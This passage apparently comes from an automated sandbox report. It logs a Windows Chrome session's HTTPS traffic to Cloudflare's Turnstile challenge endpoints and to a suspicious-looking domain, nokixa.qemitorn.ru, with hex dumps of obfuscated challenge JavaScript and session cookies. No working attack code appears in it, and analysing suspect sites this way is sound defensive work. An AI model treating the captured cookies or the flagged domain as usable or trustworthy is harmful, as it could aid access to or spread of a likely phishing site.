                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 2c 27 75 6c 48 51 56 27 3a 6b 33 28 33 36 33 29 2c 27 4a 51 45 48 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 6d 64 52 46 67 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 47 6b 68 4a 74 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 21 3d 3d 48 7d 2c 27 78 7a 46 50 65 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 5a 4b 42 47 62 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 79 4f 6c 78 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 45 45 46 62 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c
                                                                                                        Data Ascii: ,'ulHQV':k3(363),'JQEHK':function(G,H){return G(H)},'mdRFg':function(G,H){return G<H},'GkhJt':function(G,H){return G!==H},'xzFPe':function(G,H,I,J){return G(H,I,J)},'ZKBGb':function(G,H){return G(H)},'yOlxj':function(G,H){return G===H},'EEFbL':function(G,
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 6b 36 28 36 38 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 73 7d 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 6b 37 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6b 37 3d 67 4a 2c 64 3d 7b 27 58 51 56 4a 49 27 3a 6b 37 28 31 35 34 37 29 2c 27 6f 79 61 50 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 63 4c 4d 4b 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 56 59 79 6e 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4a 70 46 75 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d
                                                                                                        Data Ascii: ),o++);}else h[n]=i[l[m]][k6(688)](function(s){return'o.'+s})},function(k7,d,e,f,g){return k7=gJ,d={'XQVJI':k7(1547),'oyaPL':function(h,i){return i==h},'cLMKc':function(h,i){return h-i},'VYynI':function(h,i){return h(i)},'JpFur':function(h,i){return h(i)}


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.1749753104.18.94.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:34 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:34 UTC240INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:34 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        cache-control: max-age=2629800, public
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be784f8142b2-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.1749741104.21.58.1744431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:35 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                                                                        Host: nokixa.qemitorn.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://nokixa.qemitorn.ru/yz8E/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: XSRF-TOKEN=eyJpdiI6InROazA1RE1yVGRRRUJrQ0hydGVZRHc9PSIsInZhbHVlIjoiRTZoUHBYdFhVTnBvUC9kajlDelZuNFdtK1lGUEVIQ1hNdmsrN3FuTjRTN2plVk81d04zblU0Nm1pck53by8zQzBGaGdKWHBnSkVNZjVLTVRsKzVRRUV6UWwyMW5GWDNUVUpMTEMvNGk3bzVabS81R1hwbkpFeTNIREUvQ1cxVWwiLCJtYWMiOiI0NjBlMWI5MGFhN2QyMzlmNzFmMDMyMjViODViM2Q5M2VjMjI2MGUyNzI0YmMzODhiYjk5NWU1ZTg3ZmEyMWY2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFPWkt6R3lnbXZmVTJRd05HTGw1QWc9PSIsInZhbHVlIjoidTgvcytLZmJtTzVOZ3l2T2MzZC92akxJNVBVdU1nS3lIMUtpSkkzUG4rL3g4VWZZR0gvUWkyS3VaNXJtOWRvOEIzSG1nM2VkZzJVWGxVZFIrRk9BWnVOeTZkWEZFS21Zd0owV1RLN3ZCMG5HNTB0eG1jeE4vTVkxQXdBVUs1ZkgiLCJtYWMiOiI0YzQyMzZkMzBhNmRhODI0OTAxNWYyN2U0Y2Y5NjdhZTdhZThjOTE1NjEzNWEzYzBhYTY2OWQyNzc1Y2VkYzdhIiwidGFnIjoiIn0%3D
                                                                                                        2025-01-09 16:18:35 UTC1076INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 09 Jan 2025 16:18:35 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=14400
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2Fl3Y%2Fbp5Cw%2BuuxMrGPbPKsbDSCs%2BGRxG0MfdceJDPz%2BKZscdduUOMQQgynlO9sp%2FOxrD9JZb64R9rWW8tEbyAL0zeFBbG3cJ4BESe6gkARgqStl17cDN%2FfQkcU1Dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Vary: Accept-Encoding
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1251&min_rtt=1246&rtt_var=478&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1361&delivery_rate=2204334&cwnd=251&unsent_bytes=0&cid=c8462817a3b4517c&ts=245&x=0"
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 4642
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be7a6e3c436c-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1757&rtt_var=668&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1898&delivery_rate=1625835&cwnd=228&unsent_bytes=0&cid=c64e35f2dcad04a2&ts=3945&x=0"
                                                                                                        2025-01-09 16:18:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.1749754104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:35 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:35 UTC240INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:35 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        cache-control: max-age=2629800, public
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be7c1a7a0f7f-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:35 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.1749755104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:35 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff5be739bf042ad&lang=auto HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:35 UTC331INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:35 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 113655
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be7d2f0a0f9d-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:35 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72
                                                                                                        Data Ascii: Click%20here%20for%20more%20information%3C%2Fa%3E","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refr
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 66 61 2c 66 62 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 30 33 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 37 32 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 36 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 36 37 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 37 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 32 35 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 39 39 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                                                        Data Ascii: fY,ga,gg,gh,gi,gs,gD,gH,fa,fb){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(803))/1+parseInt(gI(372))/2+parseInt(gI(1456))/3*(-parseInt(gI(967))/4)+-parseInt(gI(707))/5*(parseInt(gI(1625))/6)+parseInt(gI(1599))/7*(-parseInt(gI(
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 75 72 6e 20 68 2d 69 7d 2c 27 46 46 49 70 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 59 79 77 64 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 68 47 70 77 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 56 71 73 59 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4c 44 41 50 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 6e 44 65 51 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6f 65 44 79 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 70 66
                                                                                                        Data Ascii: urn h-i},'FFIpT':function(h,i){return h<<i},'YywdM':function(h,i){return h&i},'hGpwo':function(h,i){return i==h},'VqsYQ':function(h,i){return h(i)},'LDAPM':function(h,i){return h!==i},'nDeQO':function(h,i){return h<i},'oeDyy':function(h,i){return i&h},'pf
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 28 32 35 36 3e 43 5b 68 69 28 38 37 38 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 68 69 28 33 37 37 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 69 28 31 32 37 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 69 28 38 37 38 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 69 28 33 30 34 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 68 69 28 33 36 35 29 5d 28 48 3c 3c 31 2c 64 5b 68 69 28 38 33 35 29 5d 28 4d 2c 31 29 29 2c 64 5b 68 69 28 33 37 37 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 69 28 31 32 37 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 68 69 28 39 32 32 29 21 3d 3d 68 69 28 31 32 30 36
                                                                                                        Data Ascii: (256>C[hi(878)](0)){for(s=0;s<F;H<<=1,d[hi(377)](I,j-1)?(I=0,G[hi(1271)](o(H)),H=0):I++,s++);for(M=C[hi(878)](0),s=0;d[hi(304)](8,s);H=d[hi(365)](H<<1,d[hi(835)](M,1)),d[hi(377)](I,j-1)?(I=0,G[hi(1271)](o(H)),H=0):I++,M>>=1,s++);}else if(hi(922)!==hi(1206
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 3c 31 2e 38 38 7c 64 5b 68 69 28 31 31 32 30 29 5d 28 4d 2c 31 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 69 28 31 32 37 31 29 5d 28 64 5b 68 69 28 31 31 33 33 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 30 3d 3d 44 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 64 5b 68 69 28 31 36 35 30 29 5d 28 73 2c 46 29 3b 48 3d 48 3c 3c 31 7c 64 5b 68 69 28 37 37 38 29 5d 28 4d 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 69 28 31 32 37 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 64 5b 68 69 28 31 30 35 37 29 5d 28 49 2c 6a 2d 31 29 29 7b 47 5b 68 69 28 31 32 37 31 29 5d 28 6f 28 48 29 29 3b
                                                                                                        Data Ascii: <1.88|d[hi(1120)](M,1),I==j-1?(I=0,G[hi(1271)](d[hi(1133)](o,H)),H=0):I++,M>>=1,s++);D--,0==D&&F++}for(M=2,s=0;d[hi(1650)](s,F);H=H<<1|d[hi(778)](M,1),j-1==I?(I=0,G[hi(1271)](o(H)),H=0):I++,M>>=1,s++);for(;;)if(H<<=1,d[hi(1057)](I,j-1)){G[hi(1271)](o(H));
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 6c 28 31 35 36 35 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 68 6c 28 33 37 39 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 68 6c 28 31 32 36 39 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 68 6c 28 31 33 38 32 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 6c 28 36 31 31 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 68 6c 28 36 31 31 29 5d 28 65 2c 4a 29 2c 4d 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 68 6c 28 38 38 35 29 5d 28 27 27 29 7d 69 66 28 64 5b 68 6c 28 38 31 32 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 68 6c 28 31 35 36 35 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c
                                                                                                        Data Ascii: (J=0,K=Math[hl(1565)](2,16),F=1;d[hl(379)](F,K);L=d[hl(1269)](G,H),H>>=1,d[hl(1382)](0,H)&&(H=j,G=d[hl(611)](o,I++)),J|=F*(0<L?1:0),F<<=1);s[B++]=d[hl(611)](e,J),M=B-1,x--;break;case 2:return D[hl(885)]('')}if(d[hl(812)](0,x)&&(x=Math[hl(1565)](2,C),C++),
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 73 28 36 33 30 29 5d 28 66 33 2c 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 27 73 27 3d 3d 3d 45 26 26 21 67 5b 68 73 28 33 38 38 29 5d 28 68 5b 44 5d 29 2c 68 73 28 31 31 37 33 29 3d 3d 3d 69 2b 44 3f 73 28 6f 5b 68 73 28 34 34 31 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 6f 5b 68 73 28 33 30 35 29 5d 28 73 2c 6f 5b 68 73 28 34 34 31 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 73 28 6f 5b 68 73 28 34 38 36 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 72 2c 49 2c 4b 2c 4c 29 7b 28 68 72 3d 62 2c 49 3d 7b 27 73 68 46 69 61 27 3a 66 75 6e 63 74 69 6f 6e 28 4a 2c 4b 2c 68 71 29 7b 72 65 74 75 72 6e 20 68 71 3d 62 2c 6f 5b 68 71 28 34
                                                                                                        Data Ascii: )];D=x[C],E=o[hs(630)](f3,g,h,D),B(E)?(F='s'===E&&!g[hs(388)](h[D]),hs(1173)===i+D?s(o[hs(441)](i,D),E):F||o[hs(305)](s,o[hs(441)](i,D),h[D])):s(o[hs(486)](i,D),E),C++);return j;function s(G,H,hr,I,K,L){(hr=b,I={'shFia':function(J,K,hq){return hq=b,o[hq(4
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 49 28 37 39 35 29 5d 29 65 5b 68 49 28 31 31 33 37 29 5d 28 63 2c 65 5b 68 49 28 38 36 31 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 68 4a 29 7b 68 4a 3d 68 49 2c 6c 5b 68 4a 28 31 32 36 38 29 5d 2b 3d 68 4a 28 37 34 35 29 2b 65 5b 68 4a 28 36 38 34 29 5d 28 69 2c 6a 29 2b 68 4a 28 33 35 36 29 7d 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 65 5b 68 49 28 36 38 34 29 5d 28 66 37 2c 66 38 28 63 29 29 7d 7d 2c 66 61 3d 5b 5d 2c 66 62 3d 30 3b 32 35 36 3e 66 62 3b 66 61 5b 66 62 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 35 35 36 29 5d 28 66 62 29 2c 66 62 2b 2b 29 3b 66 63 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 31 31 31 33 29 29 2c 66 64 3d 61 74 6f 62 28 67 4a 28 37 34 39 29 29 2c 65 4d 5b 67 4a 28 31 31 30 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 6a 2c 64 2c 65
                                                                                                        Data Ascii: I(795)])e[hI(1137)](c,e[hI(861)],function(l,hJ){hJ=hI,l[hJ(1268)]+=hJ(745)+e[hJ(684)](i,j)+hJ(356)});else return e[hI(684)](f7,f8(c))}},fa=[],fb=0;256>fb;fa[fb]=String[gJ(1556)](fb),fb++);fc=(0,eval)(gJ(1113)),fd=atob(gJ(749)),eM[gJ(1108)]=function(ij,d,e
                                                                                                        2025-01-09 16:18:35 UTC1369INData Raw: 29 2c 61 37 3d 30 29 3a 61 38 2b 2b 2c 61 39 3d 30 2c 58 2b 2b 29 3b 66 6f 72 28 61 61 3d 61 62 5b 69 6c 28 38 37 38 29 5d 28 30 29 2c 61 63 3d 30 3b 31 36 3e 61 64 3b 61 66 3d 69 5b 69 6c 28 31 36 30 31 29 5d 28 69 5b 69 6c 28 31 32 38 32 29 5d 28 61 67 2c 31 29 2c 31 2e 35 37 26 61 68 29 2c 69 5b 69 6c 28 31 33 30 31 29 5d 28 61 69 2c 61 6a 2d 31 29 3f 28 61 6b 3d 30 2c 61 6c 5b 69 6c 28 31 32 37 31 29 5d 28 61 6d 28 61 6e 29 29 2c 61 6f 3d 30 29 3a 61 70 2b 2b 2c 61 71 3e 3e 3d 31 2c 61 65 2b 2b 29 3b 7d 65 6c 73 65 20 66 5b 69 6c 28 31 35 39 30 29 5d 3d 4a 53 4f 4e 5b 69 6c 28 34 33 34 29 5d 28 66 5b 69 6c 28 31 35 39 30 29 5d 2c 4f 62 6a 65 63 74 5b 69 6c 28 31 34 34 36 29 5d 28 66 5b 69 6c 28 31 35 39 30 29 5d 29 29 7d 65 6c 73 65 20 66 5b 69 6c 28
                                                                                                        Data Ascii: ),a7=0):a8++,a9=0,X++);for(aa=ab[il(878)](0),ac=0;16>ad;af=i[il(1601)](i[il(1282)](ag,1),1.57&ah),i[il(1301)](ai,aj-1)?(ak=0,al[il(1271)](am(an)),ao=0):ap++,aq>>=1,ae++);}else f[il(1590)]=JSON[il(434)](f[il(1590)],Object[il(1446)](f[il(1590)]))}else f[il(


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.1749756104.18.94.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:35 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 3170
